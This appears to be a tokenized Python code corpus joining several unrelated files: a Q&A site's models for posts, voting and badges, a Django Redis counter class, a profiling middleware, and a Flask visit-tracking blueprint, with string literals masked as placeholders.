parse ( locale ) <EOL> self . title = title <EOL> self . reply_count = - <NUM_LIT:1> <EOL> self . is_deleted = False <EOL> self . votes = <NUM_LIT:0> <EOL> self . question = Post ( self , user , text , date , is_reply = False ) <EOL> self . date = self . question . created <EOL> self . author = self . question . author <EOL> self . answer = None <EOL> self . last_change = self . question . created <EOL> self . _update_hotness ( ) <EOL> session . add ( self ) <EOL> try_award ( '<STR_LIT>' , user , self ) <EOL> @ property <EOL> def guid ( self ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT>' % ( <EOL> settings . TAG_AUTHORITY , <EOL> self . date . strftime ( '<STR_LIT>' ) , <EOL> self . question . id <EOL> ) <EOL> @ property <EOL> def replies ( self ) : <EOL> return ImmutableList ( [ x for x in self . posts if not x . is_question ] ) <EOL> @ property <EOL> def slug ( self ) : <EOL> return slugify ( self . title ) or None <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> self . question . delete ( ) <EOL> def restore ( self ) : <EOL> """<STR_LIT>""" <EOL> self . question . restore ( ) <EOL> def accept_answer ( self , post , user = None ) : <EOL> """<STR_LIT>""" <EOL> assert post is None or post . topic == self , '<STR_LIT>' <EOL> if self . answer is not None : <EOL> self . answer . is_answer = False <EOL> atomic_add ( self . answer . author , '<STR_LIT>' , <EOL> - settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> if user is None : <EOL> user = post and post . author or self . author <EOL> if post is not None : <EOL> post . is_answer = True <EOL> atomic_add ( post . author , '<STR_LIT>' , <EOL> settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> self . answer_author = post . author <EOL> self . answer_date = post . created <EOL> self . answer = post <EOL> try_award ( '<STR_LIT>' , user , self , post ) <EOL> def bind_tags ( self , tags ) : <EOL> """<STR_LIT>""" <EOL> current_map = dict ( ( x . name , x ) for x in self . tags ) <EOL> currently_attached = set ( x . 
name for x in self . tags ) <EOL> new_tags = set ( tags ) <EOL> def lookup_tag ( name ) : <EOL> tag = Tag . query . filter_by ( locale = self . locale , <EOL> name = name ) . first ( ) <EOL> if tag is not None : <EOL> return tag <EOL> return Tag ( name , self . locale ) <EOL> for name in currently_attached . difference ( new_tags ) : <EOL> self . tags . remove ( current_map [ name ] ) <EOL> for name in new_tags . difference ( currently_attached ) : <EOL> self . tags . append ( lookup_tag ( name ) ) <EOL> def get_url_values ( self , action = None ) : <EOL> endpoint = '<STR_LIT>' if action == '<STR_LIT>' else '<STR_LIT>' <EOL> return endpoint , dict ( <EOL> lang_code = self . locale , <EOL> id = self . id , <EOL> slug = self . slug <EOL> ) <EOL> def _set_vote ( self , user , delta ) : <EOL> self . question . _set_vote ( user , delta ) <EOL> def _get_vote ( self , user ) : <EOL> self . question . _get_vote ( user ) <EOL> @ property <EOL> def is_answered ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . answer_post_id is not None or self . answer is not None <EOL> def sync_counts ( self ) : <EOL> """<STR_LIT>""" <EOL> self . votes = self . question . votes <EOL> self . reply_count = Post . filter_by ( topic = self ) . count ( ) - <NUM_LIT:1> <EOL> def _update_hotness ( self ) : <EOL> """<STR_LIT>""" <EOL> delta = self . date - datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> secs = ( delta . days * <NUM_LIT> + delta . seconds + <EOL> ( delta . microseconds / <NUM_LIT> ) ) - <NUM_LIT> <EOL> order = log ( max ( abs ( self . votes ) , <NUM_LIT:1> ) , <NUM_LIT:10> ) <EOL> sign = <NUM_LIT:1> if self . votes > <NUM_LIT:0> else - <NUM_LIT:1> if self . votes < <NUM_LIT:0> else <NUM_LIT:0> <EOL> self . hotness = round ( order + sign * secs / <NUM_LIT> , <NUM_LIT:7> ) <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . title , self . locale , self . 
votes ) <EOL> class Post ( RemoteObject , TextRendererMixin ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> remote_object_type = '<STR_LIT>' <EOL> public_fields = ( '<STR_LIT:id>' , '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:text>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __init__ ( self , topic , author , text , date = None , is_reply = True ) : <EOL> self . topic = topic <EOL> self . author = author <EOL> self . editor = None <EOL> self . text = text <EOL> self . is_deleted = False <EOL> self . is_answer = False <EOL> self . is_question = not is_reply <EOL> if date is None : <EOL> date = datetime . utcnow ( ) <EOL> topic . last_change = self . updated = self . created = date <EOL> self . votes = <NUM_LIT:0> <EOL> self . edits = <NUM_LIT:0> <EOL> self . comment_count = <NUM_LIT:0> <EOL> author . touch_activity ( topic . locale , <NUM_LIT:50> ) <EOL> session . add ( self ) <EOL> if not is_reply : <EOL> try_award ( '<STR_LIT>' , author , self ) <EOL> @ property <EOL> def guid ( self ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT>' % ( <EOL> settings . TAG_AUTHORITY , <EOL> self . created . strftime ( '<STR_LIT>' ) , <EOL> self . id <EOL> ) <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . is_deleted : <EOL> return <EOL> if self . is_question : <EOL> self . topic . is_deleted = True <EOL> for tag in self . topic . tags : <EOL> atomic_add ( tag , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> else : <EOL> atomic_add ( self . topic , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> self . is_deleted = True <EOL> def restore ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_deleted : <EOL> return <EOL> if self . is_question : <EOL> self . topic . is_deleted = False <EOL> for tag in self . topic . tags : <EOL> atomic_add ( tag , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> else : <EOL> atomic_add ( self . 
topic , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> self . is_deleted = False <EOL> @ property <EOL> def was_edited ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . editor_id is not None <EOL> def get_url_values ( self , action = None ) : <EOL> """<STR_LIT>""" <EOL> if action is not None : <EOL> assert action in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> return '<STR_LIT>' % action , { <EOL> '<STR_LIT>' : self . topic . locale , <EOL> '<STR_LIT:id>' : self . id <EOL> } <EOL> if self . is_question : <EOL> return self . topic . get_url_values ( ) <EOL> endpoint , args = self . topic . get_url_values ( ) <EOL> if not self . is_question : <EOL> args [ '<STR_LIT>' ] = '<STR_LIT>' % self . id <EOL> return endpoint , args <EOL> def edit ( self , new_text , editor = None , date = None ) : <EOL> """<STR_LIT>""" <EOL> if editor is None : <EOL> editor = self . author <EOL> if date is None : <EOL> date = datetime . utcnow ( ) <EOL> PostRevision ( self ) <EOL> self . text = new_text <EOL> self . editor = editor <EOL> self . updated = self . topic . last_change = date <EOL> self . topic . _update_hotness ( ) <EOL> atomic_add ( self , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> try_award ( '<STR_LIT>' , editor , self ) <EOL> editor . touch_activity ( self . topic . locale , <NUM_LIT:20> ) <EOL> def get_revision ( self , id ) : <EOL> """<STR_LIT>""" <EOL> entry = PostRevision . query . get ( id ) <EOL> if entry is not None and entry . post == self : <EOL> return entry <EOL> def _revert_vote ( self , vote , user ) : <EOL> atomic_add ( self , '<STR_LIT>' , - vote . delta ) <EOL> if vote . delta > <NUM_LIT:0> : <EOL> atomic_add ( user , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> if self . is_question : <EOL> atomic_add ( self . author , '<STR_LIT>' , <EOL> - settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> else : <EOL> atomic_add ( self . author , '<STR_LIT>' , <EOL> - settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> elif vote . 
delta < <NUM_LIT:0> : <EOL> atomic_add ( user , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> if user != self . author : <EOL> atomic_add ( self . author , '<STR_LIT>' , <EOL> settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> atomic_add ( user , '<STR_LIT>' , <EOL> settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> def _set_vote ( self , user , delta ) : <EOL> """<STR_LIT>""" <EOL> assert delta in ( <NUM_LIT:0> , <NUM_LIT:1> , - <NUM_LIT:1> ) , '<STR_LIT>' <EOL> vote = _Vote . query . filter_by ( user = user , post = self ) . first ( ) <EOL> if delta == <NUM_LIT:0> : <EOL> if vote : <EOL> session . delete ( vote ) <EOL> self . _revert_vote ( vote , user ) <EOL> else : <EOL> if vote is None : <EOL> vote = _Vote ( user , self , delta ) <EOL> else : <EOL> self . _revert_vote ( vote , user ) <EOL> vote . delta = delta <EOL> atomic_add ( self , '<STR_LIT>' , delta , expire = True ) <EOL> topic = Topic . query . filter_by ( question = self ) . first ( ) <EOL> if topic is not None : <EOL> topic . votes = self . votes <EOL> if delta > <NUM_LIT:0> : <EOL> atomic_add ( user , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> if self . is_question : <EOL> atomic_add ( self . author , '<STR_LIT>' , <EOL> settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> else : <EOL> atomic_add ( self . author , '<STR_LIT>' , <EOL> settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> elif delta < <NUM_LIT:0> : <EOL> atomic_add ( user , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> if self . author != user : <EOL> atomic_add ( self . author , '<STR_LIT>' , <EOL> - settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> atomic_add ( user , '<STR_LIT>' , <EOL> - settings . REPUTATION_MAP [ '<STR_LIT>' ] ) <EOL> if not hasattr ( user , '<STR_LIT>' ) : <EOL> user . _vote_cache = { } <EOL> user . _vote_cache [ self . id ] = delta <EOL> if self . is_question : <EOL> self . topic . _update_hotness ( ) <EOL> user . touch_activity ( self . topic . 
locale , <NUM_LIT:1> ) <EOL> try_award ( '<STR_LIT>' , user , self , delta ) <EOL> def _get_vote ( self , user ) : <EOL> """<STR_LIT>""" <EOL> cache = getattr ( user , '<STR_LIT>' , None ) <EOL> if cache is None : <EOL> user . _vote_cache = { } <EOL> cacheval = user . _vote_cache . get ( self . id ) <EOL> if cacheval is None : <EOL> vote = _Vote . query . filter_by ( user = user , post = self ) . first ( ) <EOL> if vote is None : <EOL> cacheval = <NUM_LIT:0> <EOL> else : <EOL> cacheval = vote . delta <EOL> user . _vote_cache [ self . id ] = cacheval <EOL> return cacheval <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> repr ( self . author . username ) , <EOL> self . updated . strftime ( '<STR_LIT>' ) , <EOL> self . votes <EOL> ) <EOL> class Comment ( TextRendererMixin ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> render_text_inline = True <EOL> def __init__ ( self , post , author , text , date = None ) : <EOL> if date is None : <EOL> date = datetime . utcnow ( ) <EOL> self . post = post <EOL> self . author = author <EOL> self . date = date <EOL> self . text = text <EOL> session . add ( self ) <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . id , <EOL> self . author . username , <EOL> self . post_id <EOL> ) <EOL> class _Vote ( object ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> def __init__ ( self , user , post , delta = <NUM_LIT:1> ) : <EOL> self . user = user <EOL> self . post = post <EOL> self . delta = delta <EOL> session . add ( self ) <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . delta , <EOL> self . user . username , <EOL> self . post_id <EOL> ) <EOL> class _UserActivity ( object ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> def __init__ ( self , user , locale ) : <EOL> self . user = user <EOL> self . locale = Locale . parse ( locale ) <EOL> self . 
counter = <NUM_LIT:0> <EOL> self . first_activity = self . last_activity = datetime . utcnow ( ) <EOL> session . add ( self ) <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . user . username , <EOL> self . locale , <EOL> self . counter <EOL> ) <EOL> class _OpenIDUserMapping ( object ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> def __init__ ( self , identity_url ) : <EOL> self . identity_url = identity_url <EOL> session . add ( self ) <EOL> class PostRevision ( object ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> def __init__ ( self , post ) : <EOL> self . post = post <EOL> self . editor = post . editor or post . author <EOL> self . date = post . updated <EOL> self . text = post . text <EOL> session . add ( self ) <EOL> def restore ( self ) : <EOL> """<STR_LIT>""" <EOL> self . post . edit ( self . text , self . editor , self . date ) <EOL> @ property <EOL> def rendered_text ( self ) : <EOL> """<STR_LIT>""" <EOL> return format_creole ( self . text ) <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . id , <EOL> self . editor . username , <EOL> self . post_id <EOL> ) <EOL> class Tag ( object ) : <EOL> """<STR_LIT>""" <EOL> query = session . query_property ( ) <EOL> def __init__ ( self , name , locale ) : <EOL> self . name = name <EOL> self . locale = Locale . parse ( locale ) <EOL> self . tagged = <NUM_LIT:0> <EOL> session . add ( self ) <EOL> @ property <EOL> def size ( self ) : <EOL> return <NUM_LIT:100> + log ( self . tagged or <NUM_LIT:1> ) * <NUM_LIT:20> <EOL> def get_url_values ( self ) : <EOL> return '<STR_LIT>' , dict ( <EOL> name = self . name , <EOL> lang_code = self . locale <EOL> ) <EOL> @ simple_repr <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . name , self . locale ) <EOL> class UserBadge ( object ) : <EOL> """<STR_LIT>""" <EOL> query = session . 
query_property ( ) <EOL> def __init__ ( self , badge , payload = None ) : <EOL> self . badge = badge <EOL> self . awarded = datetime . utcnow ( ) <EOL> self . payload = payload <EOL> class BadgeExtension ( AttributeExtension ) : <EOL> """<STR_LIT>""" <EOL> def count_badges ( self , user , badgeiter ) : <EOL> user . bronce_badges = user . silver_badges = user . gold_badges = user . platin_badges = <NUM_LIT:0> <EOL> for badge in badgeiter : <EOL> if badge : <EOL> attr = badge . level + '<STR_LIT>' <EOL> setattr ( user , attr , getattr ( user , attr , <NUM_LIT:0> ) + <NUM_LIT:1> ) <EOL> def append ( self , state , value , initiator ) : <EOL> user = state . obj ( ) <EOL> self . count_badges ( user , chain ( user . badges , [ value . badge ] ) ) <EOL> return value <EOL> def remove ( self , state , value , initiator ) : <EOL> user = state . obj ( ) <EOL> badges = set ( user . badges ) <EOL> badges . discard ( value . badge ) <EOL> self . count_badges ( user , badges ) <EOL> return value <EOL> class ReplyCollectionExtension ( AttributeExtension ) : <EOL> """<STR_LIT>""" <EOL> def append ( self , state , value , initiator ) : <EOL> atomic_add ( state . obj ( ) , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> return value <EOL> def remove ( self , state , value , initiator ) : <EOL> atomic_add ( state . obj ( ) , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> return value <EOL> class CommentCounterExtension ( AttributeExtension ) : <EOL> """<STR_LIT>""" <EOL> def append ( self , state , value , initiator ) : <EOL> atomic_add ( state . obj ( ) , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> return value <EOL> def remove ( self , state , value , initiator ) : <EOL> atomic_add ( state . 
obj ( ) , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> return value <EOL> class TagCounterExtension ( AttributeExtension ) : <EOL> """<STR_LIT>""" <EOL> def append ( self , state , value , initiator ) : <EOL> atomic_add ( value , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> return value <EOL> def remove ( self , state , value , initiator ) : <EOL> atomic_add ( value , '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> return value <EOL> mapper ( User , users , properties = dict ( <EOL> id = users . c . user_id <EOL> ) ) <EOL> mapper ( _UserActivity , user_activities , properties = dict ( <EOL> id = user_activities . c . activity_id , <EOL> user = relation ( User ) <EOL> ) ) <EOL> mapper ( UserBadge , user_badges , properties = dict ( <EOL> id = user_badges . c . badge_id , <EOL> user = relation ( User , backref = backref ( '<STR_LIT>' , extension = BadgeExtension ( ) ) ) <EOL> ) ) <EOL> mapper ( UserMessage , user_messages , properties = dict ( <EOL> id = user_messages . c . message_id , <EOL> user = relation ( User ) <EOL> ) ) <EOL> mapper ( Post , posts , properties = dict ( <EOL> id = posts . c . post_id , <EOL> author = relation ( User , primaryjoin = posts . c . author_id == users . c . user_id ) , <EOL> editor = relation ( User , primaryjoin = posts . c . editor_id == users . c . user_id ) , <EOL> comments = relation ( Comment , backref = '<STR_LIT>' , <EOL> extension = CommentCounterExtension ( ) , <EOL> order_by = [ comments . c . date ] ) , <EOL> text = synonym ( '<STR_LIT>' , map_column = True ) <EOL> ) ) <EOL> mapper ( Topic , topics , properties = dict ( <EOL> id = topics . c . topic_id , <EOL> author = relation ( User , primaryjoin = <EOL> topics . c . author_id == users . c . user_id ) , <EOL> answer_author = relation ( User , primaryjoin = <EOL> topics . c . answer_author_id == users . c . user_id ) , <EOL> question = relation ( Post , primaryjoin = <EOL> topics . c . question_post_id == posts . c . 
post_id , <EOL> post_update = True ) , <EOL> answer = relation ( Post , primaryjoin = <EOL> topics . c . answer_post_id == posts . c . post_id , <EOL> post_update = True ) , <EOL> posts = relation ( Post , primaryjoin = <EOL> posts . c . topic_id == topics . c . topic_id , <EOL> order_by = [ posts . c . is_answer . desc ( ) , <EOL> posts . c . votes . desc ( ) ] , <EOL> backref = backref ( '<STR_LIT>' , post_update = True ) , <EOL> extension = ReplyCollectionExtension ( ) ) , <EOL> tags = relation ( Tag , secondary = topic_tags , order_by = [ tags . c . name ] , <EOL> lazy = False , extension = TagCounterExtension ( ) ) <EOL> ) , order_by = [ topics . c . last_change . desc ( ) ] ) <EOL> mapper ( Comment , comments , properties = dict ( <EOL> author = relation ( User ) , <EOL> text = synonym ( '<STR_LIT>' , map_column = True ) <EOL> ) ) <EOL> mapper ( Tag , tags , properties = dict ( <EOL> id = tags . c . tag_id , <EOL> topics = dynamic_loader ( Topic , secondary = topic_tags , <EOL> query_class = TopicQuery ) <EOL> ) ) <EOL> mapper ( _Vote , votes , properties = dict ( <EOL> user = relation ( User ) , <EOL> post = relation ( Post ) <EOL> ) , primary_key = [ votes . c . user_id , votes . c . post_id ] ) <EOL> mapper ( _OpenIDUserMapping , openid_user_mapping , properties = dict ( <EOL> user = relation ( User , lazy = False , backref = backref ( '<STR_LIT>' , lazy = True , <EOL> collection_class = set ) ) <EOL> ) ) <EOL> mapper ( PostRevision , post_revisions , properties = dict ( <EOL> id = post_revisions . c . revision_id , <EOL> post = relation ( Post , backref = backref ( '<STR_LIT>' , lazy = '<STR_LIT>' ) ) , <EOL> editor = relation ( User ) <EOL> ) ) <EOL> from solace . utils . support import slugify <EOL> from solace . badges import try_award </s>
<s> from django . conf import settings <EOL> from django . utils . functional import cached_property <EOL> import redis <EOL> from redis . sentinel import Sentinel <EOL> from redis . exceptions import ConnectionError , ResponseError <EOL> COUNTER_CACHE_KEY = '<STR_LIT>' <EOL> COUNTER_FREQ_CACHE_KEY = '<STR_LIT>' <EOL> class Counters ( object ) : <EOL> @ cached_property <EOL> def _redis ( self ) : <EOL> if getattr ( settings , '<STR_LIT>' , None ) : <EOL> sentinel = Sentinel ( settings . EXPERIMENTS_REDIS_SENTINELS , socket_timeout = settings . EXPERIMENTS_REDIS_SENTINELS_TIMEOUT ) <EOL> host , port = sentinel . discover_master ( settings . EXPERIMENTS_REDIS_MASTER_NAME ) <EOL> else : <EOL> host = getattr ( settings , '<STR_LIT>' , '<STR_LIT:localhost>' ) <EOL> port = getattr ( settings , '<STR_LIT>' , <NUM_LIT> ) <EOL> password = getattr ( settings , '<STR_LIT>' , None ) <EOL> db = getattr ( settings , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> return redis . Redis ( host = host , port = port , password = password , db = db ) <EOL> def increment ( self , key , participant_identifier , count = <NUM_LIT:1> ) : <EOL> if count == <NUM_LIT:0> : <EOL> return <EOL> try : <EOL> cache_key = COUNTER_CACHE_KEY % key <EOL> freq_cache_key = COUNTER_FREQ_CACHE_KEY % key <EOL> new_value = self . _redis . hincrby ( cache_key , participant_identifier , count ) <EOL> if new_value > count : <EOL> self . _redis . hincrby ( freq_cache_key , new_value - count , - <NUM_LIT:1> ) <EOL> self . _redis . hincrby ( freq_cache_key , new_value , <NUM_LIT:1> ) <EOL> except ( ConnectionError , ResponseError ) : <EOL> pass <EOL> def clear ( self , key , participant_identifier ) : <EOL> try : <EOL> cache_key = COUNTER_CACHE_KEY % key <EOL> pipe = self . _redis . pipeline ( ) <EOL> freq , _ = pipe . hget ( cache_key , participant_identifier ) . hdel ( cache_key , participant_identifier ) . execute ( ) <EOL> freq_cache_key = COUNTER_FREQ_CACHE_KEY % key <EOL> self . _redis . 
hincrby ( freq_cache_key , freq , - <NUM_LIT:1> ) <EOL> except ( ConnectionError , ResponseError ) : <EOL> pass <EOL> def get ( self , key ) : <EOL> try : <EOL> cache_key = COUNTER_CACHE_KEY % key <EOL> return self . _redis . hlen ( cache_key ) <EOL> except ( ConnectionError , ResponseError ) : <EOL> return <NUM_LIT:0> <EOL> def get_frequency ( self , key , participant_identifier ) : <EOL> try : <EOL> cache_key = COUNTER_CACHE_KEY % key <EOL> freq = self . _redis . hget ( cache_key , participant_identifier ) <EOL> return int ( freq ) if freq else <NUM_LIT:0> <EOL> except ( ConnectionError , ResponseError ) : <EOL> return <NUM_LIT:0> <EOL> def get_frequencies ( self , key ) : <EOL> try : <EOL> freq_cache_key = COUNTER_FREQ_CACHE_KEY % key <EOL> return dict ( ( int ( k ) , int ( v ) ) for ( k , v ) in self . _redis . hgetall ( freq_cache_key ) . items ( ) if int ( v ) > <NUM_LIT:0> ) <EOL> except ( ConnectionError , ResponseError ) : <EOL> return tuple ( ) <EOL> def reset ( self , key ) : <EOL> try : <EOL> cache_key = COUNTER_CACHE_KEY % key <EOL> self . _redis . delete ( cache_key ) <EOL> freq_cache_key = COUNTER_FREQ_CACHE_KEY % key <EOL> self . _redis . delete ( freq_cache_key ) <EOL> return True <EOL> except ( ConnectionError , ResponseError ) : <EOL> return False <EOL> def reset_pattern ( self , pattern_key ) : <EOL> try : <EOL> cache_key = COUNTER_CACHE_KEY % pattern_key <EOL> for key in self . _redis . keys ( cache_key ) : <EOL> self . _redis . delete ( key ) <EOL> freq_cache_key = COUNTER_FREQ_CACHE_KEY % pattern_key <EOL> for key in self . _redis . keys ( freq_cache_key ) : <EOL> self . _redis . delete ( key ) <EOL> return True <EOL> except ( ConnectionError , ResponseError ) : <EOL> return False </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> from django . conf import settings <EOL> from django . core . signals import request_started , request_finished <EOL> from django . core . urlresolvers import reverse <EOL> from django . utils . encoding import smart_unicode , smart_str <EOL> from speedbar . signals import setup_request_tracing , store_request_trace <EOL> from speedbar . utils import init_modules <EOL> from speedbar . modules . base import RequestTrace <EOL> if getattr ( settings , '<STR_LIT>' , True ) : <EOL> init_modules ( ) <EOL> request_started . connect ( setup_request_tracing , dispatch_uid = '<STR_LIT>' ) <EOL> request_finished . connect ( store_request_trace , dispatch_uid = '<STR_LIT>' ) <EOL> HTML_TYPES = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> METRIC_PLACEHOLDER_RE = re . compile ( '<STR_LIT>' ) <EOL> class SpeedbarMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def process_request ( self , request ) : <EOL> if getattr ( settings , '<STR_LIT>' , True ) : <EOL> request_trace = RequestTrace . instance ( ) <EOL> request_trace . stacktracer . root . label = '<STR_LIT>' % ( request . method , request . path ) <EOL> request_trace . request = request <EOL> def process_response ( self , request , response ) : <EOL> if not getattr ( settings , '<STR_LIT>' , True ) : <EOL> return response <EOL> request_trace = RequestTrace . instance ( ) <EOL> request_trace . response = response <EOL> metrics = dict ( ( key , module . get_metrics ( ) ) for key , module in request_trace . modules . items ( ) ) <EOL> if self . should_return_response_headers ( request ) : <EOL> self . add_response_headers ( response , metrics ) <EOL> if self . should_return_trace_header ( request ) : <EOL> response [ '<STR_LIT>' ] = reverse ( '<STR_LIT>' , args = [ request_trace . id ] ) <EOL> request_trace . persist_log = True <EOL> if self . should_replace_template_tags ( request ) : <EOL> if '<STR_LIT>' not in response . get ( '<STR_LIT>' , '<STR_LIT>' ) and response . 
get ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) . split ( '<STR_LIT:;>' ) [ <NUM_LIT:0> ] in HTML_TYPES : <EOL> if hasattr ( response , '<STR_LIT>' ) : <EOL> response . render ( ) <EOL> content = smart_unicode ( response . content ) <EOL> content = self . replace_templatetag_placeholders ( content , metrics ) <EOL> if getattr ( settings , '<STR_LIT>' , True ) : <EOL> panel_url = reverse ( '<STR_LIT>' , args = [ request_trace . id ] ) <EOL> panel_placeholder_url = reverse ( '<STR_LIT>' ) <EOL> content = content . replace ( panel_placeholder_url , panel_url ) <EOL> request_trace . persist_details = True <EOL> response . content = smart_str ( content ) <EOL> if response . get ( '<STR_LIT>' , None ) : <EOL> response [ '<STR_LIT>' ] = len ( response . content ) <EOL> return response <EOL> def should_return_response_headers ( self , request ) : <EOL> return getattr ( settings , '<STR_LIT>' , False ) <EOL> def should_return_trace_header ( self , request ) : <EOL> return hasattr ( request , '<STR_LIT:user>' ) and request . user . is_staff and getattr ( settings , '<STR_LIT>' , True ) <EOL> def should_replace_template_tags ( self , request ) : <EOL> return hasattr ( request , '<STR_LIT:user>' ) and request . user . is_staff <EOL> def add_response_headers ( self , response , metrics ) : <EOL> """<STR_LIT>""" <EOL> def sanitize ( string ) : <EOL> return string . title ( ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:->' ) <EOL> for module , module_values in metrics . items ( ) : <EOL> for key , value in module_values . items ( ) : <EOL> response [ '<STR_LIT>' % ( sanitize ( module ) , sanitize ( key ) ) ] = value <EOL> def replace_templatetag_placeholders ( self , content , metrics ) : <EOL> """<STR_LIT>""" <EOL> def replace_placeholder ( match ) : <EOL> module = match . group ( '<STR_LIT>' ) <EOL> metric = match . group ( '<STR_LIT>' ) <EOL> return unicode ( metrics [ module ] [ metric ] ) <EOL> return METRIC_PLACEHOLDER_RE . sub ( replace_placeholder , content ) </s>
<s> def check_args ( args , options ) : <EOL> for key in options [ "<STR_LIT>" ] : <EOL> if not args . has_key ( key ) : <EOL> raise MaglicaCliException , options <EOL> return True <EOL> class MaglicaCliException ( Exception ) : <EOL> pass </s>
<s> from flask import Blueprint , Response , render_template , flash , redirect , session , url_for , request , g <EOL> from flask . ext . login import current_user , login_required <EOL> from app import app , db , login_manager <EOL> from app . tracking . models import Site , Visit <EOL> from app . tracking . forms import RegisterSiteForm <EOL> from datetime import datetime <EOL> from app . tracking . geodata import get_geodata <EOL> from app . tracking . decorators import crossdomain <EOL> mod = Blueprint ( '<STR_LIT>' , __name__ ) <EOL> @ mod . route ( '<STR_LIT>' , methods = ( '<STR_LIT:GET>' , '<STR_LIT:POST>' ) ) <EOL> @ login_required <EOL> def sites_view ( ) : <EOL> form = RegisterSiteForm ( request . form ) <EOL> sites = current_user . sites . all ( ) <EOL> if form . validate_on_submit ( ) : <EOL> site = Site ( ) <EOL> form . populate_obj ( site ) <EOL> site . user_id = current_user . id <EOL> db . session . add ( site ) <EOL> db . session . commit ( ) <EOL> return redirect ( '<STR_LIT>' ) <EOL> return render_template ( '<STR_LIT>' , form = form , sites = sites ) <EOL> @ mod . route ( '<STR_LIT>' , methods = ( '<STR_LIT:GET>' , '<STR_LIT:POST>' ) ) <EOL> @ crossdomain ( origin = "<STR_LIT:*>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT>" ] , headers = "<STR_LIT>" , max_age = "<STR_LIT>" ) <EOL> def register_visit ( site_id ) : <EOL> site = Site . get_by_id ( site_id ) <EOL> if site : <EOL> browser = request . headers . get ( '<STR_LIT>' ) <EOL> date = datetime . now ( ) <EOL> event = request . args . get ( '<STR_LIT>' ) <EOL> url = request . url <EOL> ip_address = request . remote_addr <EOL> geo = get_geodata ( ip_address ) <EOL> location_full = "<STR_LIT:U+002CU+0020>" . join ( [ geo [ '<STR_LIT>' ] , geo [ '<STR_LIT>' ] , geo [ '<STR_LIT>' ] , geo [ '<STR_LIT>' ] ] ) <EOL> location = "<STR_LIT:U+002CU+0020>" . 
join ( [ geo [ '<STR_LIT>' ] , geo [ '<STR_LIT>' ] ] ) <EOL> visit = Visit ( browser , date , event , url , ip_address , location_full , location ) <EOL> visit . site_id = site_id <EOL> db . session . add ( visit ) <EOL> db . session . commit ( ) <EOL> return Response ( "<STR_LIT>" , content_type = "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from client import Service </s>
